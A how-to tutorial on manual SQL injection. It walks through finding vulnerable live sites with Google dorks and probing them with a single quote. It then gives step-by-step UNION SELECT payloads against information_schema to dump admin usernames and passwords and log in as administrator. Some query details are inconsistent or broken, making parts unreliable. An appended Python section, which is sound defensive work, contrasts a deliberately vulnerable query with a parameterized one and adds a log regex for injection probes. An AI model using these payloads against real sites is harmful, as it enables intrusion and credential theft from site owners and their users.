SQL Injection is the insertion of malicious SQL code into an application's database queries. The code is crafted so that the application runs queries it was never meant to run. SQL injection is the top attack that websites face: it is ranked 1st in the top 10 attacks against websites. So how is SQL injection done, and what can it do?

SQL injection can be performed with a tool such as Havij, but doing it manually is always better; there is no comparison between a human mind and a piece of software.
How to SQL Inject Manually?
Step 1: Find Google Dorks
Search with Google dorks (search strings that return lists of websites likely to be vulnerable). Download a list of all dorks.
Search for any of these keywords:
Inurl:index.php?id=
Inurl:article.php?id=
Inurl:gallery.php?id=
Now open any of the websites in the results.
Step 2: Check if the website is vulnerable or not.
Simply add a single quote ( ' ) at the end of the website URL. If it gives an error like:
"There is an error in your SQL syntax. Check the manual that corresponds to your MySQL server"
(Screenshot: the error in my case.)
Note: the error may not look exactly like the one above. If you get an error, the website is vulnerable; if not, try some other website.
Step 3: Find the number of columns in the database query.
Remove the (') from the URL and add "order by int_value" (int_value being some integer).
Example
www.example.com/index.php?id=3 order by 1
www.example.com/index.php?id=3 order by 2
www.example.com/index.php?id=3 order by 3
www.example.com/index.php?id=3 order by 4
Repeat this, increasing the integer, until you get an error. In my case the error occurred for 4, so the number of columns is 3. If it doesn't work, try adding -- at the end.
Example
www.example.com/index.php?id=3 order by 1--
(Screenshot: you will get an error like this.)
Step 4: Find the vulnerable column
Replace id=int with id=-int in the URL and add "union select 1,2,3,..." up to the last column. In our case the number of columns is 11. Replace 3 with -3 and add union select 1,2,3,4,5,6,7,8,9,10.
Example:
www.example.com/index.php?id=-3 union select 1,2,3,4,5,6,7,8,9,10
If that does not work, add "and 1=2" after id=-3.
Example:
www.example.com/index.php?id=-3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10
(Screenshot: column 3 in my case.)
Now the page will show which column numbers are reflected. The page may look strange, but the vulnerable column number will be printed somewhere on it. There may be more than one vulnerable column; pick any one of them. In our case it is 3.
Step 5: Find version, database and user
Simply replace the vulnerable column number with "version()".
Ex - www.example.com/index.php?id=-3 union select 1,2,version()
Press enter and note the version. Similarly, replace the column number with database() and user() respectively.
Step 6: Find the table names in the database
Replace the vulnerable column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--".
Ex: www.example.com/index.php?id=-3 union select 1, group_concat(table_name),3 from information_schema.tables where table_schema=database()--
It will display the list of table names. Now use your common sense to select the one you think is the admin table (generally the admin table looks like admin, admin_tab, admin_info, etc.). Here I choose the admintab table.
Step 7: Find the column names
Convert the table name to its ASCII codes in MySQL CHAR() format.
In our case it is "admintab", so its MySQL CHAR format is "CHAR(97, 100, 109, 105, 110, 116, 97, 98 )". If you don't know the ASCII codes, install the HackBar add-on for Mozilla Firefox (only).
In the toolbar, go to sql->mysql->mysqlchar() in the add-on and type the table name, here "admintab".
Now replace the vulnerable column number with "group_concat(column_name)" and add "from information_schema.column where table_schema=mysqlchar--".
Ex: www.example.com/index.php?id=-3 union select 1, group_concat(column_name),3 from information_schema.column where table_schema=CHAR(97, 100, 109, 105, 110, 116, 97, 98 )--
This query will display the list of columns in the table admintab.
Ex: (admin_name, admin_pass, admin_username, email, phone_no, address, etc.)
Again, use your brain to select the columns you think may contain sensitive information, or try all combinations. Replace "group_concat(column_name)" with "group_concat(column1, 0x3a, column2)".
Ex: www.example.com/index.php?id=-3 union select 1, group_concat(admin_pass, 0x3a, admin_username)
If you do all the steps correctly and the website is weak, you can get information such as the admin password and username.
Step 8: Find the admin page of the website.
Just Google "admin example.com", or use tools like Havij or any other third-party app to locate it. Enter the username and password to log in as admin.
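As an added example from the defending side (not part of the original tutorial), here is the lookup pattern that steps 2 to 4 rely on, beside its parameterized form, plus a check that flags the tutorial's probe strings in web-server access-log lines. It uses an in-memory SQLite table constructed here as a stand-in for the MySQL-backed index.php?id= page; the log lines are constructed as well.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the page's "index.php?id=" lookup.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (3, 'Third post', 'public text');
    """)
    return con

def lookup_vulnerable(con, raw_id):
    # The pattern the tutorial exploits: the query-string value is pasted
    # straight into the SQL text, so "order by N" and "union select ..."
    # are executed as SQL instead of being compared as an id.
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return con.execute(sql).fetchall()

def lookup_hardened(con, raw_id):
    # Enforce the expected type, then bind the value as a parameter.
    # Anything that is not an integer is rejected before reaching the DB,
    # and a bound value can only ever be compared as data, never parsed.
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return con.execute(sql, (article_id,)).fetchall()

# Markers taken from the tutorial's own steps, for flagging probes in
# access logs (case-insensitive, tolerant of + and %20 as spaces).
PROBE_RE = re.compile(
    r"(order\s+by\s+\d+|union\s+(all\s+)?select|information_schema\.|%27|')",
    re.IGNORECASE,
)

def flag_requests(log_lines):
    # Return the log lines whose request string matches a probe marker.
    return [line for line in log_lines
            if PROBE_RE.search(line.replace("+", " ").replace("%20", " "))]

if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "-3 union select 1,2,3"))  # attacker's row
    print(lookup_hardened(con, "-3 union select 1,2,3"))    # []
```

The single-quote marker will also match legitimate requests that carry an apostrophe, so treat a hit as something to review rather than block on its own.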
This is a how-to-SQL-inject tutorial, intended for educational purposes only. Please comment and share.